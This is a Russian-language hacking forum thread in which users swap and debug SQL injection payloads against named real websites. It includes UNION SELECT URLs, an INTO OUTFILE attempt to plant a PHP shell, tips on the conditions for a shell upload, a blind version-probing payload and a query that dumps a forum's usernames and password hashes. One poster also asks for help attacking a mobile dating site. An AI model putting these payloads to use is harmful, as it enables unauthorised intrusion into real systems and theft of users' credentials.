Пытаюсь записать в файл так вот он все проводит норм а пройти запрос куда записать не хочет! Ошибка такого вида Code: MySQL error: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near [COLOR=SlateGray]'[/COLOR][COLOR=Sienna]\'[/COLOR]/tmp/aaa.php[COLOR=Sienna]\'[/COLOR]--[COLOR=SlateGray]'[/COLOR] at line 1 Темно-оранжевый - мои ковычки Серый - то что он не может прочитать Пробывал и в хексе(0x и т.д.) не получаеться! Мб кто знает?
http://mial.cs.sfu.ca/newsItem.php?id=-1+union+select+1,0x66726f6d205b2063617368205d207768697468206c6f7665202929292929,3,4,5,6,7,8+from+User+into+outfile+'/tmp/aaaa.php'-- То что в хексе там текст 'test!' так как чтобы проверить дейстивтельно ли записал он запрос
А зачем он нужен, если и так видно, что ковычки экранируются. diznt Путь должен быть в ковычках, в хексе нельзя, в твоём случае залить не получится add И там даже file_priv N помоему
americanbible.org/absport/news/item.php?id=181' При подборе вообще не реагирует. в чем дело? jokester я так и так пробывал конечно))
diznt, шелл можно залить если: 1) Ковычки не экранизируются. 2) Если Linux, то должна читаться (/etc/passwd) (Это я проще объяснил =\). 3) Надо, что бы прав хватило на читалку/найти папку с правами доступными для данного пользователя, которого мы определяем с помощью таблицы mysql.user. http://www.americanbible.org/absport/news/item.php?id=181' - с чего ты взял, что тут есть скуля?
Похоже на хранимую процедуру, скорее всего инъекцию не удастся провести зачем? не обзяательно, для INTO OUTFILE нужно magic_quotes_gpc=off и полный путь до папки, доступной на запись. Получить этот путь можно разными способами, /etc/passwd может вообще не пригодится. P.S. что за мода пошла писать ковычки?
http://www.americanbible.org/absport/news/item.php?id=181'/**/and/**/if(4=substring(version(),1,1),(select/**/1/**/from/**/ABS_shortcutURLs),1)/*
привет всем. а где можно посоветоваться на счет мобильно6о сата love.wab.ru. я читал сдесь сегодня что в 2007 году разбирали этот сайт- но только на начальной стадии. брат достал уже . лезет туда знакомится а потом пинкоды отсылает. хотелось бы этих его подружек отправить на заслуженый отдых. P.S в его анкете менял пароль но он заводит новую анкету надоел у матери деньги таскать!!
teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+cpg_users-- Блин почему не выводит ничего? =\ Таблица такая сам смотрел и колонка тоже такая
diznt, проверь table_schema. То есть таблица может находится в другой ДБ, то есть имя таблицы будет писаться так. [table_schema].[имя таблица]
Фильтрация таким образом не повличет ли за собой уязвимости? $style_text = htmlspecialchars(trim($HTTP_POST_VARS['style_text']));
Для cpg_users table_schema=KOLESHEV_1 но http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+KOLESHEV_1.cpg_users+--+ command denied to user .. зато можешь посмотреть юзеров форума http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,concat_ws(0x2F,username,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+phpbb_users+limit+1,1+--+
ElteRUS вопрос почему в конце +--+ ставиться? или к примеру -- или /* ? Я просто не понимаю а ставлю --
diznt, потому что согласно документации mysql после -- должен идти пробел А почему вообще ставится ? Это знаки комментария. Нужны для того что-бы обрубить продолжения запроса, когда мы всовываемся в него со своей инъекцией
Не думай об этом)) Делай так. Составил запрос. Ошибка? Пробуешь --. не пашет? Пробуешь /*. Не пашет? Пробуешь +--+. Снова не пашет? Ну на кройняк ++-- =))
